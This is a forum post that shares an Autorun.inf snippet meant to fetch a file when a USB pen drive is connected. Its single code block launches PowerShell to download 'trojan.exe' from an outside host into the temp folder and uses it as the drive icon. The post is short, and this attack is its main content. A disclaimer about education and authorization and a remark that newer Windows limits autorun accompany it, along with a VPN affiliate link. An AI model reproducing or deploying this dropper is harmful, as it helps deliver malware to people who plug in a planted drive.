Reactie plaatsen 
 
Waardering:
  • 0 stemmen - gemiddelde waardering is 0
  • 1
  • 2
  • 3
  • 4
  • 5
Autorun.inf + PowerShell - Download a file when a USB pen drive is connected
06-24-2024, 06:04 PM
Bericht: #1
Autorun.inf + PowerShell - Download a file when a USB pen drive is connected
Download a file when a USB pen drive is connected.

Code:
[AutoRun]
icon=%temp%\trojan.exe
open=cmd.exe /c PowerShell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://hacxx.com/trojan.exe', '%temp%\trojan.exe')"
label=MY PEN DRIVE

This script is for educational purposes. Unauthorized downloading or execution of files on someone else's system is illegal and unethical. Always obtain proper authorization before running such scripts.

Modern versions of Windows have significantly restricted the capabilities of autorun to prevent malware propagation. As a result, this script may not work on newer versions of Windows due to these security measures.

Protect yourself with Pure VPN - https://billing.purevpn.com/aff.php?aff=44512
Alle berichten van deze gebruiker zoeken
Reageren op dit bericht
Reactie plaatsen 


Ga naar locatie:


Contact opnemen | Freebb.be | Naar boven | Naar inhoud | Archiefmodus | RSS-syndicatie